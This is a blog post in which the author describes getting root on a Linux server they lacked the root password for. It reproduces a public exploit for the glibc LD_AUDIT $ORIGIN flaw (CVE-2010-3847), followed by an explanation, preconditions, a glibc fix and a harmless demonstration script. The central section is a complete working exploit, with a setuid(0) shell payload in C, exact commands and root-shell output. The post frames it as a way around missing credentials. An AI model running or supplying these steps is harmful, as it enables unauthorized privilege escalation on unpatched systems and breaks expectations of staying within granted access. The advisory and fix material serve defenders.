Linux 2.6 kernel local privilege escalation: getting root from a low-privilege account
2013-06-20 18:09
Preface: Ugh. The PHP version on a Linux server was too old and had to be upgraded before the ThinkPHP framework could be used, but I did not have the root password and so could not upgrade it. Although the server sat in a virtual cluster, I did not have the cluster password either. Changing the root password by editing the boot entries would have been, first, too much hassle and, second, well, too low-tech. After a round of Baidu and Google I found that the 2.6 kernel has a vulnerability, and after N failures I finally found a tool that works. The steps are below. It magically turns $ into #; I do not really understand what that means either. Straight to the code:
What follows is Tavis Ormandy's public write-up of CVE-2010-3847. Despite the title of this post, the flaw is not in the kernel: it is in the way glibc's dynamic loader (ld.so) expands $ORIGIN in LD_AUDIT for setuid programs, so it hits any Linux system running a vulnerable glibc, whatever the kernel version. From the advisory:

It is possible to exploit this flaw to execute arbitrary code as root. Please note, this is a low impact vulnerability that is only of interest to security professionals and system administrators. End users do not need to be concerned. Exploitation would look like the following.

# Create a directory in /tmp we can control.
$ mkdir /tmp/exploit
# Link to an suid binary, thus changing the definition of $ORIGIN.
$ ln /bin/ping /tmp/exploit/target
# Open a file descriptor to the target binary (note: some users are surprised
# to learn exec can be used to manipulate the redirections of the current
# shell if a command is not specified. This is what is happening below).
$ exec 3< /tmp/exploit/target
# This descriptor should now be accessible via /proc.
$ ls -l /proc/$$/fd/3
lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target*
# Remove the directory previously created
$ rm -rf /tmp/exploit/
# The /proc link should still exist, but now will be marked deleted.
$ ls -l /proc/$$/fd/3
lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target (deleted)
# Replace the directory with a payload DSO, thus making $ORIGIN a valid target to dlopen().
$ cat > payload.c
#include <stdlib.h>
#include <unistd.h>
void __attribute__((constructor)) init() { setuid(0); system("/bin/bash"); }
# (press Enter after the line, then Ctrl-D to end the input; the original note says Ctrl-C, which also leaves the line in the file because cat has already written it)
$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
$ ls -l /tmp/exploit
-rwxrwx--- 1 taviso taviso 4.2K Oct 15 09:22 /tmp/exploit*
# Now force the link in /proc to load $ORIGIN via LD_AUDIT.
$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
sh-4.1# whoami
root
sh-4.1# id
uid=0(root) gid=500(taviso)

Why the directory dance is needed: the loader derives $ORIGIN from the directory part of the path the program was run from. Because the binary is executed through /proc/self/fd/3, that path is /tmp/exploit/target (deleted), so $ORIGIN expands to /tmp/exploit. A directory cannot be dlopen()ed, but once the directory has been removed and a shared object has been written at the same path, /tmp/exploit is a valid audit library. LD_AUDIT libraries are loaded before main(), the binary is setuid root, and the constructor therefore runs as root; the prompt changing from $ to # in the preface is simply that root shell. Only the uid changes (the payload calls setuid(0) and not setgid), which is why id still shows gid=500.

Preconditions the transcript does not spell out: the target must actually be setuid root (distributions that grant ping cap_net_raw instead are not usable this way, so pick another setuid binary); ln needs /tmp and the target on the same filesystem, since it creates a hard link; and on kernels with fs.protected_hardlinks=1 (Linux 3.6 and later) an unprivileged user cannot hard-link a root-owned file at all.

Fix (this is a glibc bug, not a GCC or kernel bug):
Update glibc to a build that contains the fix for CVE-2010-3847 (and its companion CVE-2010-3856, also in LD_AUDIT handling); check the installed version with ldd --version against your distribution's advisory.
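The two parts of the procedure above that can be tried safely, as an added example that is not part of the original post or of the advisory it quotes: a pre-flight check of the conditions the transcript relies on (setuid target, same filesystem for the hard link, fs.protected_hardlinks) and the directory-replacement trick itself, run against a plain temporary file instead of a setuid binary so that no privilege is involved. It assumes Linux with /proc mounted, GNU coreutils (stat -c, readlink, mktemp -d) and a writable /tmp; the function names and the /tmp/origin.* naming are this example's own.

```shell
#!/bin/sh
# Added example, not from the original post. Exercises the preconditions and
# the $ORIGIN directory trick without any setuid binary.
# Assumes Linux with /proc, GNU coreutils and a writable /tmp.

# Preconditions the transcript relies on. Prints one line per check and
# returns 0 only if all of them hold. $1 = setuid target, default /bin/ping.
preflight() {
    target=${1:-/bin/ping}
    ok=0
    if [ -u "$target" ]; then
        echo "ok   $target is setuid"
    else
        echo "fail $target is not setuid (a capability-based ping will not do)"; ok=1
    fi
    # ln(1) makes a hard link, so /tmp and the target must be on one filesystem.
    if [ -n "$(stat -c %d "$target" 2>/dev/null)" ] &&
       [ "$(stat -c %d /tmp)" = "$(stat -c %d "$target")" ]; then
        echo "ok   /tmp and $target share a filesystem (hard link possible)"
    else
        echo "fail /tmp and $target are on different filesystems or $target is missing"; ok=1
    fi
    # Since Linux 3.6, fs.protected_hardlinks=1 refuses hard links to files you
    # do not own, which breaks 'ln /bin/ping ...' for an unprivileged user.
    ph=$(cat /proc/sys/fs/protected_hardlinks 2>/dev/null || echo 0)
    if [ "$ph" = "0" ]; then
        echo "ok   fs.protected_hardlinks=0"
    else
        echo "fail fs.protected_hardlinks=$ph (hard link to a root-owned file refused)"; ok=1
    fi
    return $ok
}

# The trick itself: keep an fd open on a file inside a directory, delete the
# directory, and put a regular file at the directory's old path. Prints that
# path; afterwards it names a regular file, the state the loader is tricked
# into treating as $ORIGIN. Nothing here is setuid, so it is safe anywhere.
origin_trick() {
    dir=$(mktemp -d /tmp/origin.XXXXXX) || return 1
    : > "$dir/target"                      # stand-in for the hard-linked suid binary
    exec 3< "$dir/target"                  # same 'exec 3< ...' as in the transcript
    rm -rf "$dir"
    resolved=$(readlink /proc/self/fd/3)   # e.g. /tmp/origin.AbC123/target (deleted)
    exec 3<&-
    resolved=${resolved%" (deleted)"}      # strip the marker /proc appends
    origin=$(dirname "$resolved")          # what $ORIGIN would expand to
    : > "$origin" || return 1              # the directory is gone; a file takes its path
    echo "$origin"
}

# Usage: sh origin_trick.sh [setuid-binary]
preflight "$1" || echo "preflight: not every precondition holds on this host"
p=$(origin_trick) && echo "$p is now a regular file: $(ls -ld "$p")" && rm -f "$p"
```

In the real run the stand-in file is the hard link to the setuid binary, the regular file is the payload DSO written by gcc, and the final step is LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3; on a patched glibc that last step is refused for a setuid program, which is the only difference between a vulnerable host and a fixed one.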